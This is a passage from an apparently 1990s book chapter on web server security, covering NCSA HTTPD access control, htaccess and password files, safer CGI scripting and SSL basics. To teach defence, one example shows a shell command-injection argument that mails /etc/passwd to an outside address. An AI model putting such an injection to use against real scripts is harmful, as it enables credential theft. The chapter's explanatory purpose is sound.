Day 14

Chapter 28 Web Server Security and Access Control

Hints for Making Your Server More Secure
Hints on Writing More Secure CGI Scripts
An Introduction to Web Server Access Control and Authentication
Access Control and Authentication in NCSA HTTPD
NCSA Options
NCSA Options and Access Control Overrides
Secure Network Connections and SSL
Summary
Q&A

Internet security is a hot topic these days. Plenty of fear and loathing has been spread around concerning so-called hackers who break into systems using only a telephone, a few resistors, and a spoon, and wreak havoc with the files that are stored on those systems. Because you've got a Web server running, you have a system on the Internet, and based on the rumors, you may be worried about the security of that system.

Much of the fear about security on the Internet is media hype; although the threat of potential damage to your system from intruders is a real one, it's not as commonplace as the newspapers would have you believe. The threat of an outside intruder being able to get into your system through your Web server is a small one. HTTP is a small and simple protocol with few holes or obvious chances for external access. In fact, you are much more likely to have problems with internal users either intentionally or unintentionally compromising your system by installing dangerous programs or allowing access from the outside that you hadn't intended them to provide.

I don't have the space to provide a full tutorial on Internet security in this book; there are plenty of books out there that will help you protect your system (in particular, check out Internet Firewalls and Network Security, from New Riders Publishing; Practical UNIX Security, Garfinkel & Spafford, from O'Reilly & Associates, and Firewalls and Internet Security, Cheswick and Bellovin, from Addison Wesley). What I can do is provide some basic ways in which you can protect your Web server from both the outside and the inside. And I'll discuss access control and authorization, which are simple ways to protect published Web presentations from unauthorized eyes.

In particular, this chapter will cover the following topics:

Hints and tips for making your server more secure from unauthorized users (or damage from your own users)
Suggestions for writing more secure CGI scripts, or at least not writing scripts with major holes
Web server access control and authentication: what it means, how it works, and why you would want it
Setting up access control and authentication in your own Web server
The NCSA options and overrides for preventing or allowing dangerous features to different users and directories

Note

Although I have a basic understanding of network security, I don't claim to be an expert. I had help on this chapter from Eric Murray (the same one who also wrote the Perl scripts in Chapter 20, "Useful Forms and Scripts"), who has done Internet security administration and programming for many years.

Hints for Making Your Server More Secure

So you want to protect your Web server against things that go bump in the night. You've come to the right place. These hints will help protect your system and your files not only from external intruders, but also from internal users who might cause mischief either intentionally or unintentionally in the course of setting up their Web presentations.

Note that making your server more secure generally also makes your server less fun. Two of the biggest security holes for Web servers are CGI scripts and server includes, which give you the ability to do forms and to automatically generate HTML files on-the-fly. Depending on the security goals for your server and the features you want to have available in your Web server, you might choose to follow only some of the hints in this chapter or to enable some of them only for especially trusted users.

Run Your Server as Nobody

By default, most UNIX servers are defined to run HTTPD as the user Nobody, who belongs to the group Nogroup. Usually, Nobody and Nogroup have limited access to the system on which they run. Nobody and Nogroup can write only to a few directories, which means they cannot delete or change files unless they have explicit access to them.

Having your Web server run under this restricted user is a very good idea. It means that if someone manages to break into your system using your Web server, she is limited in the amount of damage she can do. If your server is running as root, intruders can potentially do enormous damage to your system and your files depending on how much access they manage to get.

Of course, the disadvantage of running as Nobody is that if you actually do want the server to change a file-for example, as part of the CGI script-you have to allow the Nobody user access to that file, usually by making it world-writable. When a file is world-writable, someone from inside the system can modify it as well. You've traded one form of security for another.

There are two solutions to this problem. One is to make sure that all files that need to be writable by Nobody are owned by Nobody, using the chown command. (You won't be able to write to them after that, so make sure you know what you're doing.) The second solution is to create a special group with a limited number of users, including Nobody, and then run the HTTPD server as that group. (You can change the group in your configuration files.) That way you can make files writable by that group, and the server will also have access to them.

Limit Access to CGI Scripts

Because CGI scripts allow anyone on the Web to run a program on your server based on any input they choose to supply, CGI scripts are probably the largest security risk for your site. By allowing CGI scripts (either as regular scripts, as form submissions, or as NCSA includes), you are potentially opening up your server to break-ins, damage, or simply swamping the system with multiple script requests that end up being too much for the CPU to handle.

Probably the best thing you can do for your server, in terms of security, is to disallow all CGI scripts entirely, or at least limit them to trusted published scripts that you have tested and are sure will not harm your system. But because forms and includes are lots of fun, turning everything off might be an extreme measure.

What you can do is limit the use of CGI on your system. Only allow scripts in a central location such as a single cgi-bin directory. Make your scripts generic so that multiple users can use them. If you allow your users to install scripts, have them submit scripts to you first so you can check them for obvious security holes that might have unwittingly been put in.

Later in this chapter, in "Hints on Writing More Secure CGI Scripts," you'll find more information on making sure the CGI scripts you have do not create potential holes in your system.

Limit Symbolic Links

Symbolic links are an alias between one file and another. If you create a link to a Web page, you can refer to that link in a URL, and the Web server will happily load the page to which that link points.

If you use CERN's HTTPD, there is nothing keeping your users from making symbolic links from their own Web trees to other files anywhere on your file system, which makes those files accessible to anyone on the Web. You might consider this a feature or a bug, depending on how concerned you are about having your files linked to the outside world.

In NCSA, you can disable symbolic links, or rather the links can still exist, but the Web server will not follow them. To do this, make sure your access.conf does not have a FollowSymLinks option in it (you'll find out more about this later in this chapter). An alternative option, SymLinksIfOwnerMatch, allows the server to follow the symbolic link only if the owner of the file and the owner of the link are the same user, which provides a more secure method of still allowing symbolic links within a single user's tree.

Disable Server Includes

Server includes, for all the power they provide, are a security hole-particularly the ones that run scripts (exec includes). By allowing server includes, you are allowing strange data to be passed outside your server on-the-fly, and you might not be able to control what data is being sent out or what affect that data could have on your system.

Note

Turning off server includes also speeds up the time it takes to send files to the browser because the files do not need to be parsed beforehand.

If you must allow server includes, you might want to allow only regular includes and not #exec includes by using the IncludesNoExec option. This allows the simpler include mechanisms such as #include and #echo, but it disables scripts, providing a happy medium for security and fun.

Disable Directory Indexing

Again, most servers are set up so that if a user requests a URL that ends in a directory, a default filename (usually index.html) is appended to that URL. But what if the directory doesn't contain a file called index.html? Usually the server will send a listing of the files in that directory, in much the same way that you get a listing for files in an FTP directory (see Figure 28.1).

Figure 28.1 : A directory listing.

Is directory indexing a security problem? It isn't if you don't mind your readers seeing all the files in the directory. However, you might have private files in there or files you aren't ready to release to the world yet. By allowing directory indexing and not providing a default file, you're allowing anyone to browse that directory and choose which files to look at.

There are two ways to get around this:

Always make sure you have an index.htmlfile in each directory. If the directory is otherwise off-limits to readers, you can create an empty index.html file (although one that says something, anything, would be much more useful to your readers).
In NCSA's HTTPD, indexes are turned off by default. However, in the sample access.conf file, the following line is included:
Options Indexes FollowSymLinksIf you are using the sample configuration files for your server, you can remove the word Indexes from that line to turn off directory indexing.

Prevent Spiders from Accessing Your Server

Spiders (sometimes called robots) are programs that automatically explore the Web. They jump from link to link and page to page, note the names and URLs of files they find, and sometimes store the contents of those pages in a database. Those databases of pages that they find can then be searched for keywords, allowing users to search Web pages for a word, phrase, or other search key.

New Term

Spiders or robots are programs that follow links between pages, storing information about each page they find. That information then can usually be searched for specific keywords, providing the URLs of the pages that contain those keywords.

Note

Sounds like a great idea, doesn't it? Unfortunately, the Web is growing much too fast for the spiders to be able to keep up. Word has it that some of the best spiders, running full-time on very expensive and fast machines, are taking six months to traverse the Web. Given that the Web is growing much faster than that, it's unlikely that any one spider can manage to keep up. However, spiders such as WebCrawler (http://www.webcrawler.com/) and AltaVista (http://www.altavista.digital.com/) can provide an index of a good portion of the Web in which you can search for particular strings.

The problem with spiders and your Web server is that a poorly written spider can bring your server to its knees with constant connections, it can end up mapping files inside your server that you don't want to be mapped. For these reasons, a group of spider developers got together and came up with a way that Webmasters can exclude their servers or portions of their servers from being searched by a spider.

To restrict access to your server from a spider, create a file called robots.txt and put it at the top level of your Web hierarchy so that its URL is http://yoursite.com/robots.txt.

The format of robots.txt is one or more lines describing specific spiders that you'll allow to explore your server (called user-agents), and one or more lines describing the directory trees you want excluded (disallowed). In its most basic form ("No Spiders Wanted"), a robots.txt file looks like this:

User-agent: * Disallow: /

If you don't want any spiders to explore a hierarchy called data (perhaps it contains lots of files that aren't useful except for internal use), your robots.txt might look like this:

User-agent: * Disallow: /data/

You can allow individual trusted spiders into your server by adding additional User-agent and Disallow lines after the initial one. For example, the following robots.txt file denies access to all spiders except WebCrawler:

User-agent: * Disallow: / # let webcrawler in /user User-agent: WebCrawler/0.00000001 Disallow:

Note that robots.txt is checked only by spiders that conform to the rules. A renegade spider can still wreak havoc on your site, but installing a robot.txt file will dissuade most of the standard robots from exploring your site.

You can find out more about spiders, robots, and the robot.txt file; hints for dealing with renegade spiders; and the names of spiders for your User-agent fields, at http://web.nexor.co.uk/mak/doc/robots/robots.html.

Hints on Writing More Secure CGI Scripts

Previously, I mentioned that turning off CGI scripts was probably the first thing you should do to make your server more secure. But without CGI scripts, you can't have forms, search engines, clickable images, or server-side includes. You lose the stuff that makes Web presentations fun. So, perhaps shutting off CGI isn't the best solution.

The next-best solution is to control your CGI scripts. Make sure that you're the only one who can put scripts into your CGI directory, or write all the scripts yourself. The latter is perhaps the best way you can be sure that those scripts are not going to have problems. Note that if someone is really determined to do damage to your system, that person might try several different routes other than those your Web server provides. But even a small amount of checking in your CGI scripts can make it more difficult for the casual troublemakers.

The best way to write secure CGI scripts is to be paranoid and assume that someone will try something nasty. Experiment with your scripts and try to anticipate what sorts of funny arguments might get passed into your script from forms.

Funny arguments? What sort of funny arguments? The most obvious would be extra data to a shell script that the shell would then execute. For example, here's part of my original version of the pinggeneric script that I described in Chapter 19, "Beginning CGI Scripting":

#!/bin/sh ison='who | grep $1'

The pinggeneric script, as you might remember, takes a single user as an argument and checks to see whether that user is logged in. If all you get as an argument is a single user, things are fine. But you might end up getting an argument that looks like this:

foo; mail me@host.com </etc/passwd

That's not a legitimate argument, of course. That's someone playing games with your script. But what happens when your script gets that argument? Bad things. Basically, because of the way you've written things, this entire line ends up getting executed by the shell:

who | grep foo; mail me@host.com </etc/passwd

What does this mean? If you're not familiar with how the shell works, the semicolon is used to separate individual commands. So in addition to checking whether foo is logged in, you've also just sent your password file to the user me@host.com. That user can then try to crack those passwords at his or her leisure. Oops.

So what can you do to close up security holes like this and others? Here are a few hints:

Put brackets and quotes around all shell arguments, so that $1 becomes "${1}". This isolates multiword commands and prevents the shell from executing bits of code disguised as arguments-such as that argument with the semicolon in it.
Check for special shell characters such as semicolons. Make sure the input to your script looks at least something like what you expect.
Use a language in which it is more difficult to slip extra arguments to the shell, such as Perl or C.
If you're using forms, never encode important information into the form itself as hidden fields or as arguments to the script you've used in ACTION. Remember, your users can get access to the contents of the form simply by using View Source. They can edit and change those contents and resubmit the form to your script with changed information. Your script can't tell the difference between data it got from your real form and data it got from a modified form.

For more information about making your CGI scripts more secure, you might want to check out the collection of CGI security information Paul Phillips keeps at http://www.cerf.net/~paulp/cgi-security/.

An Introduction to Web Server Access Control and Authentication

When you set up a Web server and publish your pages on it, all those pages can be viewed by anyone with a browser on the Web. That's the point, after all, isn't it? Web publishing means public consumption.

Actually, there could be some Web files published that you don't really want the world to see. Maybe you have some internal files that aren't ready for public consumption yet, but you want a few people to be able to see them. Maybe you want to have a whole Web presentation that is available only to sites within your internal network (the "intranet" as it's popularly known).

For this reason, Web servers provide access control and authentication, features you can turn on and assign to individual directories and files on your server. Those protected files and directories can live alongside your more public presentations. When someone who isn't allowed tries to view the protected stuff, the Web server won't let them.

In this section, you'll learn everything you ever wanted to know about access control and authentication in the NCSA Web server and its brethren, including all the basics, how they actually work, how secret it actually is, and how to set up access control in your own server.

Note that even if you're not using an NCSA-like Web server, all the concepts in this section will still be valuable to you. Web authentication works the same way across servers; there are usually just different files that need editing in order to set it up. With the knowledge you'll gain from this section, you can then usually go to your specific server configuration information, and figure it out from there.

Note

Access control and authentication are pretty dry and technical stuff. Unless you're interested in this or looking to get this set up on your own system, you're probably going to end up bored to tears by the end of this section. I won't be at all offended if you decide you'd rather go see a movie. Go on. Have a good time.

What Do Access Control and Authentication Mean?

First, let's go over some of the specifics of what access control and authentication mean and how they work with Web servers and browsers.

Access control means that access to the files and subdirectories within a directory on your Web server is somehow restricted. You can restrict the access to your files from certain Internet hosts. For example, they can be read only from within your internal network; or you can also control the access to files on a per-user basis by setting up a special file of users and passwords for that set of files.

If your files have been protected by host names, when someone from outside your set of allowed hosts tries to access your pages, the server returns an Access Denied error. (Actually, to be more specific, it returns a 403 Forbidden error.) Access is categorically denied (see Figure 28.2).

Figure 28.2 : Access denied.

Authentication is the process that allows a user trying to access your files from a browser to enter a name and password and gain access to those files. When the server has verified that a user on a browser has the right user name and password, that user is considered to be authenticated.

New Term

Authentication allows you to control access to a set of files so that readers must enter a name and password to be able to view them.

Authentication requires two separate connections between the browser and the server, with several steps involved. Figure 28.3 shows the process.

Figure 28.3 : Authentication.

The following steps explain the pocess in greater detail:

A user running a browser requests a file from a protected directory.
The server notes that the requested URL is from a protected directory.
The server sends back an Authentication Required message (and again, to be exact, it's a 401 Unauthorized error).
The browser prompts the user for a name and password (see Figure 28.4).

Figure 28.4 : Name and password required.

The browser tries the request again, this time with the name and password included in the request.
The server checks the user's name and password against its access files.
If the name and password match, the server returns the requested files and allows access to the protected directory.

Note that when a user has been authenticated, that user can continue to access different pages from the same server and directory without having to re-enter his or her name and password. Also, that user name is logged to the access log file for your server each time the user accesses a file or submits a form, and it is available as the REMOTE_USER environment variable in your CGI scripts.

Note

It is considered extremely impolite in the Web community to use authentication information for anything other than informational purposes. Don't abuse the information you can get from authenti-cation.

Types of Access Control

To set up access control, you have to specially configure your server. Again, in this chapter, I'll talk specifically about the CERN and NCSA servers on UNIX systems; your server might have a similar method of accomplishing access control. The NCSA server enables you to set up access control for your files on different levels, including what you want to protect and whom you want to be able to access it.

NCSA enables you to protect single directories or groups of directories. For example, you can protect all the files contained in a single directory and its subdirectories, or all the files contained in all the directories called public_html (in the case of user directories).

NCSA does not have file-level protection, although you can put that protected file in a subdirectory and then restrict access to that directory.

NCSA also allows access control based on the host, domain, or full or partial IP address of the browser making the connection; for example, you can allow connections only from the same system as the server or deny connections from a particular domain or system.

In terms of user-level access control, NCSA allows user authentication as an individual or as part of a group (for example, allowing in only people who are part of the group Administration). User and group access is set up independently of the system's own user and group access files.

You can also have multiple password and group files on the same machine for different access control schemes. For example, you might have a subscription-based Web presentation that requires one set of users and groups, and another presentation for sharing industry secrets that requires another set of users and groups. NCSA enables you to set up different password realms so that you can have different forms of access control for different subdirectories.

How Secure Is It?

Access control and authentication provide only a very simple level of security for the files
on your server by preventing curious users from gaining access to those files. Determined users will still be able to find ways around the security provided by access control and authentication.

In particular, restricting access to your files based on host names or IP addresses only means that systems that say they have the specified host name or IP address can gain access to your files. There is no way to verify that the system calling itself a trusted system is indeed a trusted system.

In terms of the security of authentication, most servers support what is called basic authentication. Basic authentication is the process I described in "What Do Access Control and Authentication Mean?" where the browser and server talk to each other to get a name and password from the reader. The password that the user gives to the browser is sent over the network encoded (using the program uuencode) but not encrypted. This means that if someone were to come across the right packet or intercept the browser's request, that person could easily decode the password and gain access to the files on the Web server using that name and password.

A more secure form of authentication involves using a browser that supports encrypted authentication (recent versions of NCSA Mosaic have authentication schemes based on Kerberos and MD5, which will assumedly be supported in the NCSA server as well), or to use basic authentication over an encrypted connection such as Netscape's SSL provides. You'll find out more about SSL later in this chapter.

Access Control and Authentication in NCSA HTTPD

In this section, you'll learn all about setting up access control and authentication in the NCSA server (and servers based on it, such as Apache and WinHTTPD), including general instructions for creating global and per-directory access files, controlling access by IP and host, and adding authentication for users and groups. After this section, you'll also know a little more about how NCSA uses access control to control the various features of the NCSA server such as CGI scripts and server includes.

Global and Directory-Based Access Control

NCSA's method of access control and authentication can operate on a global basis, on a per-directory basis, or both, with special access control files in subdirectories overriding the values in the global configuration file and in other access control files in parent directories (see Figure 28.5).

Figure 28.5 : Access control in NCSA.

The default access control file for the entire server is access.conf, in the conf directory with the httpd.conf and srm.conf files. This file is usually writable only by root so that you as the Webmaster can keep control of it.

The per-directory access control file is usually called .htaccess. (You can change that name in your srm.conf file using the AccessFileName directive.) Because anyone can create an htaccess file, your users can administer the access control for their own presentations without needing to contact you or reboot the server.

Note

Anyone can create a .htaccess file. What they can do in that file, however, is determined by you in the global access.conf. Users will not be able to override your default settings if you don't want them to. You'll learn about how to do this later.

Configuring the access.conf file and the htaccess files for access control and authentication is done in similar ways. First, I'll describe the htaccess file because it is the most commonly used and easier of the two.

The htaccess file can contain several general directives and a <LIMIT> section. It might look something like this:

Options Includes AuthType Basic AuthName "Subscribers Only" AuthUserFile /home/www/magazine/.htpasswd AuthGroupFile /home/www/magazine/.htgroup <LIMIT GET> require subscribers </LIMIT>

You'll learn what all of this means in the following sections. The important thing to realize is that the information contained in an htaccess file affects all the files in that directory and all the files in any subdirectories. To change the values for a subdirectory, just add a different htaccess file.

The global access.conf file has a similar format, except that you need some way of indicating which directory the directives and <LIMIT> affect. You do that in access.conf by enclosing all the access control directives inside a <DIRECTORY> section, like this:

<DIRECTORY /home/www/magazine> Options Includes AuthType Basic AuthName "Subscribers Only" AuthUserFile /home/www/magazine/.htpasswd AuthGroupFile /home/www/magazine/.htgroup <LIMIT GET> require subscribers </LIMIT> </DIRECTORY>

Note that the directory this template affects is specified in the first <DIRECTORY> section and indicates the actual file system directory name. To use templates for subdirectories, specify those subdirectories in a different <DIRECTORY> section after the first one (don't nest them). You can use as many <DIRECTORY> sections as you want.

Note

<DIRECTORY> and <LIMIT> might look like HTML tags, but they're not. They are not part of any HTML specification and are used only for access control.

Of course, you're allowed to have both a default access control set up in access.conf and individual ones in htaccess files. This affords you and your users a great deal of flexibility in how to set up Web presentations.

Restricting Access By Host

The simplest form of access control for a directory is to restrict access by host, or (more correctly) to restrict access by a host's host name, domain, or full or partial IP address. Only browsers running on systems that match the pattern will be allowed access to the protected file.

NCSA allows several ways of restricting access by host. You can specify the hosts that are allowed access, the hosts that are denied access, or both. The following is what a simple denial looks like. (This one is from an .htaccess file. Remember, if you put this in the global access.conf file, put a <DIRECTORY> clause around it with a specific directory name.)

<LIMIT GET> deny from .netcom.com </LIMIT>

This LIMIT statement says that no hosts from inside the netcom.com domain can access the files from within this subdirectory. To allow hosts to access your files, use the allow command:

<LIMIT GET> deny from .netcom.com allow from netcom16.netcom.com </LIMIT>

The hosts you choose to allow or deny can be any of several kinds of hosts or IP addresses:

Fully qualified host names such as myhost.mydomain.com or unix12.myschool.edu, which allow or deny access to that specific host name.
Partial domain names such as .sun.com or .ix.netcom.com, which allow or deny all systems within that domain (don't forget the leading period).
Full IP addresses such as 194.56.23.12, which have the same effect as fully qualified host names.
Partial IP addresses such as 194, 194.45, or 194.45.231, which allow or deny access based on the network that system is on (which might not produce the same effect as restricting access by domain name). You can specify up to the first three sections (bytes) of the IP address.
All, which allows or denies all host names (useful for when you have both an allow and a deny).

If you have both allow and deny commands, the deny command is evaluated first, and the allow can provide exceptions to that command. For example, to restrict access to a directory so that only my home system can access it, I would use this <LIMIT> statement:

<LIMIT GET> deny from all allow from death.lne.com </LIMIT>

To reverse the order in which deny and allow are evaluated, use the order command, like this:

<LIMIT GET> order allow,deny allow from netcom.com deny from netcom17.netcom.com </LIMIT>

It's a good idea to use order all the time so that you don't have to remember which is the default order and end up making a mistake. Note that the actual order in which the allow and deny commands appear isn't important. It is order that makes the difference.

By default, any hosts that you don't explicitly deny or allow in a <LIMIT> are allowed access to your directory. There are two ways to fix that:

Use a deny from all command, and then use allow to provide exceptions.
Use the following order command:

LIMIT GET> order mutual-failure allow from .lne.com </LIMIT>

The order mutual-failure command says to let in all hosts from allow, deny all hosts from deny, and then deny everyone else.

Setting Up a Password File

The second form of access control is based on a set of acceptable users. To allow access to protected files by specific users, you need to create a special file containing those users' names and passwords. This file is entirely different from the password file on the system itself, although both look similar and use similar methods for encrypting and decrypting the passwords.

You can have any number of independent password files for your Web server, depending on the realm of password schemes you want to use. For a simple server, for instance, you might have only one. For a server with multiple presentations that each require different kinds of authentication, you might want to have multiple password files.

Where you put your password files is up to you. I like to have a central admin directory in which my password files are located, with each one named after the scheme that uses it. Traditionally, however, the password file is called .htpasswd and is contained in the same directory as your .htaccess file so that both are together, which makes it easy to make changes to both and to keep track of which password file goes with which set of directories.

To add a user to a password file, use the htpasswd command, which is part of the NCSA distribution (its source is in the support directory). The htpasswd command takes two arguments: the full pathname of the password file, and a user name. If this is the first user you are adding to the password file, you also have to use the -c option (to create the file):

htpasswd -c /home/www/protected/.htpasswd webmaster

This command creates a password file called .htpasswd in the directory /home/www/protected and adds the user webmaster. You will be prompted for the webmaster's password. The password is encrypted, and the user is added to the file:

webmaster:kJQ9igMlauL7k

You can use the htpasswd command to add as many users to the password file as you want (but you don't have to use the -c command more than once for each password).

Note

If you try to use htpasswd to add a user to a password file and the user already exists, htpasswd assumes you just want to change that user's password. If you want to delete a user, edit the file and delete the appropriate line.

Restricting Access By User

When you have a password file set up, go back and edit your access file (either the .htaccess file or the global access.conf). You'll need to add several authentication directives and a special command. Here's what the new access file might look like:

AuthType Basic AuthName Webmaster Only AuthUserFile /home/www/webmaster/.htpasswd <LIMIT GET> require user webmaster </LIMIT>

This example protects the files contained in the directory /home/www/webmaster so that only the user webmaster can access them.

The AuthType directive indicates that you will use Basic authentication to get the user name and password from your reader. You probably don't have much of a choice for the authorization type, given that Basic is the only form of authentication currently implemented in most servers. Actually, you don't need to include this line at all, but it's a good idea to do so in case new forms of authentication do appear.

The AuthName is simply a name indicating what the user ID and password is for. The browser uses this in the dialog for the user and password.

The AuthName is used by the browser in the name and password dialog box to tell your users which user name and password to enter. If you have multiple forms of authentication on the same server, your users may need some way of telling them apart. AuthName provides an indication of the service they're trying to access. If you don't include an AuthName, the dialog will say UNKNOWN, which is somewhat confusing. Figure 28.6 shows the password dialog box where the value of AuthName is Laura's Stuff.

Figure 28.6 : The AuthName.

The AuthUserFile directive tells the server which password file to use when it does get a user and a password back from the browser. The path to the password file is a full system path as it appears on your file system.

Finally, the familiar <LIMIT> is where you indicate exactly which users are allowed into these protected directories by using the require user command. Here you can specify individual users who are allowed access or multiple users separated by commas:

require user jill,bob,fred,susan

You can also allow access to all the users in the password file by using require with the valid-user keyword instead of user, like this:

require valid-user

The valid-user keyword is a shorthand way of including everyone in the password file as part of the access list.

You can also use both require and deny, or allow, to further limit access control not only to specific users but specific users on specific hosts. For example, this <LIMIT> would limit access to the user maria at the site home.com:

<LIMIT GET> require user maria deny from all allow from .home.com </LIMIT>

Any access control based on hosts takes precedence over user or group authentication. It doesn't matter whether Maria is Maria; if she's on the wrong system, the server will deny access to the files before she gets to enter her name and password.

Setting Up a Group File

Groups are simply a way of providing an alias for a set of users so that you don't have to type all their names in the require command or allow everyone in the password file access, as you would with valid-users. For example, you might have a group for Engineering, writers, or webmasters. When you have a group set up, access is given only to those authenticated users that are also part of that group.

To set up a group, you define the group name and who belongs to that group as part of a Web group file. The group file is located somewhere on your file system (traditionally called .htgroup and in the same directory to which it refers) that looks like this:

mygroup: me, tom, fred, jill anothergroup: webmaster, mygroup

Note

Like password files, Web group files have nothing to do with the UNIX system group files, although the syntax is similar.

Each line defines a group and contains the name of the group as the first field, followed by the users that make up that group.

The users for the group can include user names (which must be defined in a Web password file) or names of other groups. New groups must be defined before they can be used in other groups.

Restricting Access By Group

When you have a group file set up, you can protect a directory based on the users in that group. This is indicated in your configuration file in much the same way that user access was indicated, with the addition of the AuthGroupFile directive, which indicates the group file that you'll be using:

AuthType Basic AuthName Web Online! AuthUserFile /home/www/web-online/.htpasswd AuthGroupFile /home/www/web-online/.htgroup <LIMIT GET> require group hosts,general </LIMIT>

To restrict access to the directory to users within the group, use the require group command with the name of the group (or groups, separated by commas). Note that if you have both require user and require group commands, all those values (all the users in the require user list and all the users in the groups) are allowed access to the given files.

Just as with require user, you can further restrict the access by host name by including allow and deny lines along with the require command. For example, this <LIMIT> would limit access to the group managers at the site work.com:

<LIMIT GET> require group managers deny from all allow from .work.com </LIMIT>

NCSA Options

NCSA's access control mechanisms apply to more than simply allowing users access to individual files. They also enable you to control which features are allowed within certain directories, including server includes, directory indexing, or CGI scripts in individual directories.

Each access configuration file, including each <DIRECTORY> part of the global access.conf and each .htaccess file, can have an Options command that indicates which options are allowed for that directory and its subdirectories. By default, if no Options command is specified, all options defined by the parent directory (or the access.conf file) are allowed. Here's a typical Options line:

Options Indexes IncludesNoExec

You can include any of the options in a single Options command. Only the options that are listed are allowed for that directory. However, Options commands for subdirectories in the access.conf file, or those that are contained in .htaccess files for those subdirectories, can also contain Options and can override the default options. To prevent this, you can use the AllowOverride directive in your access.conf file (and only in that file) to indicate which options can be overridden in subdirectories. See the following section, "NCSA Options and Access Control Overrides," for more information about AllowOverride.

Table 28.1 shows the possible values of the Options command:

Table 28.1. Possible values for the Options command.

Option	What It Means
`None`	No options are allowed for this directory.
`All`	All options are allowed for this directory.
`FollowSymLinks`	If symbolic links exist within this directory, browsers can access the files they point to by accessing the link. This can be a security hole if your users link to private system files.
`SymLinksIfOwnerMatch`	Symbolic links will be followed only if the owner of the link is also the owner of the file. This option is more secure than `FollowSymLinks` because it prevents links to random system files but allows links within your user's own trees.
`ExecCGI`	This option allows CGI scripts to be executed within the directory. You must also have an `AddType` directive in `srm.conf` or in a `.htaccess` file for allowing `.cgi` files for this to work. Only enable this option for users that you know you can trust.
`Includes`	This option allows server-side includes. You must also have an `AddType` directive in `srm.conf` or in an `.htaccess` file for allowing parsed HTML files (see Chapter 27, "Web Server Hints, Tricks, and Tips").
`IncludesNoExec`	This option allows only the server includes that don't execute scripts (`#exec` includes). This option is more secure than `Includes` because it prevents scripts from being executed while still allowing the more simple server includes such as `#echo` and `#include`.
`Indexes`	This option allows directory indexing for this directory, which enables users to see all the files within that directory.

Note

Many of the options available in the NCSA server are security holes. Depending on how secure you want your server to be, you might want to disable most or all of these options in your global access.conf file. Also keep in mind that, by default, all options are turned on. So if you do not have an access.conf file or if you don't include an Options line, all the options are available to anyone on your server.

NCSA Options and Access Control Overrides

Overrides determine which of the access controls and options that you have set up in your access.conf can be overridden in subdirectories. By default, the NCSA server allows all overrides, which means that anyone can put an .htaccess file anywhere and change any of your default access control options. You can prevent the options you've specified in access.conf from being overridden by using the AllowOverrides directive, like this:

AllowOverrides Options AuthConfig

There is only one AllowOverrides directive, in your access.conf file (and it can be specified only once). AllowOverrides cannot be further restricted in .htaccess files.

From a security standpoint, the best way to protect your server is to set the default access control and Options in your access.conf file and then turn off all overrides (AllowOverrides None). This prevents your users from creating their own .htaccess files and overriding any of your specifications. But you might want to allow one or more overrides for subdirectories to give your users more control over their files, depending on how your server is set up.

Table 28.2 shows the possible values of AllowOverrides.

Table 28.2. Possible overrides.

`AllowOverride` Value	What It Means
`None`	Nothing can be overridden in `.htaccess` files for subdirectories.
`All`	Everything can be overridden.
`Options`	Values for the `Option` directive can be added to `.htaccess` files.
`FileInfo`	Values for the `AddType` and `AddEncoding` directives, for adding support for MIME types, can be added to `.htaccess` files.
`AuthConfig`	Values for the `AuthName`, `AuthType`, `AuthUserFile` and `AuthGroupFile` directives for authentication can be added to the `.htaccess` files.
`Limit`	The `<LIMIT>` section can be added to the `.htaccess` files.

Secure Network Connections and SSL

The Internet is inherently not a very secure place, particularly for very sensitive information that you don't want intercepted or viewed by prying eyes. Although basic authentication in World Wide Web servers is minimally acceptable, it is by no means secure.

For true security on the Web, you need to use some form of encryption and authentication between the browser and the server to prevent the information between the two from being seen or changed by an unwanted third party. The most popular mechanism for secure connections on the Web at the moment is the SSL mechanism as developed by Netscape.

SSL, which stands for Secure Socket Layer, encrypts the actual network connection between the browser and the server. Because it's an actual secure network connection, you could theoretically use that connection for more than Web stuff; for example, for secure Telnet or Gopher.

Note

SSL is one of two proposals for sending encrypted data over the Web; the other is SHTTP. SHTTP, developed jointly by CommerceNet, EIT, and NCSA, is an enhanced version of the HTTP protocol that allows secure transactions in the form of signed or encrypted documents transmitted over a regular HTTP connection. Although SHTTP and SSL each have their technical advantages for different purposes, SSL seems to have the advantage in the marketplace. If you're interested in learning more about SHTTP, see the information at http://www.eit.com/projects/s-http/.

In this section I'll talk about SSL, how it works cryptographically, how browsers and servers communicate using SSL connections, and how to set up SSL in your own server.

How SSL Works

SSL works on three basic principles of cryptography: public key encryption and digital certificates to set up the initial greeting and verify that the server is who it says it is, and then special session keys to actually encrypt the data being transmitted over the Internet.

Note

All the information in this section is, admittedly, very much of a simplification. Cryptography is a fascinating but very complicated form of mathematics that doesn't lend itself well to description in a few pages of a "Teach Yourself" book. If you're interested in looking deeper into cryptography, you might want to check out books that specialize in computer security and cryptography such as Applied Cryptography by Bruce Schneier, Wiley Press.

Public Key Encryption

Public Key encryption is a cryptographic mechanism that ensures the validity of data as well as who it comes from. The idea behind public key encryption is that every party in the transaction has two keys: a public key and a private key. Information encrypted with the public key can be decrypted only by the private key. Information encrypted with the private key, in turn, can only be decrypted with the public key.

The public key is widely disseminated in public. The private key, however, is kept close to home. With both keys available, an individual can then use public key encryption in the following ways:

If an individual encrypts the data with their private key, anyone with the public key can decrypt it. This is a way for that person to verify that a message actually does come from him; because no one else has the private key, no one else could possibly have generated that encrypted message.
If an individual wants to send information intended only for another person, they can encrypt that information with the other person's public key. Then, only the person with the private key can decrypt it.

Digital Certificates

The problem with public key encryption, particularly on the Net, is with verifying that the public key someone gives you is indeed their public key. If company X sends you their public key, how can you be sure that someone else isn't masquerading as company X and giving you their own public key instead?

This is where digital certificates come in. A digital certificate is effectively an organization's public key encrypted by the private key of a central organization called a certificate authority. The certificate authority, or CA, is a central, trustworthy organization that is authorized to sign digital certificates. If you get your certificate signed by a CA, anyone can verify that your public key does indeed belong to you by verifying that the CA's digital signature is valid.

How do you verify that a CA's signature is valid? You have a set of certificate authorities that you already know are valid (usually their public keys are available to you in some way that makes them trustworthy). So, if someone gives you a certificate signed by a CA you trust, you can decrypt their public key using the public key of the CA that you already have.

Certificate authorities are hierarchical; a central CA can authorize another CA to issue certificates, and they can do the same to CAs below them. So any individual certificate you get may have a chain of signatures; eventually you can follow them all back up the chain to the topmost CA that you know. Or, at least, that's the theory. In reality, a company called Verisign is the most popular and active CA where most certificates used for SSL are generated.

Session Keys

While public key encryption is very secure, it's also very slow if the actual public key is used to encrypt the information to be transmitted. For this reason, most systems that use public key encryption use the public keys for the initial greeting and then use a session key to encrypt the data so that things move faster.

The session key is essentially a really big number: usually either 40-bit (240 possible combinations) or 128-bit (2128 possible combinations), depending on whether your software is the international or United States-only version.

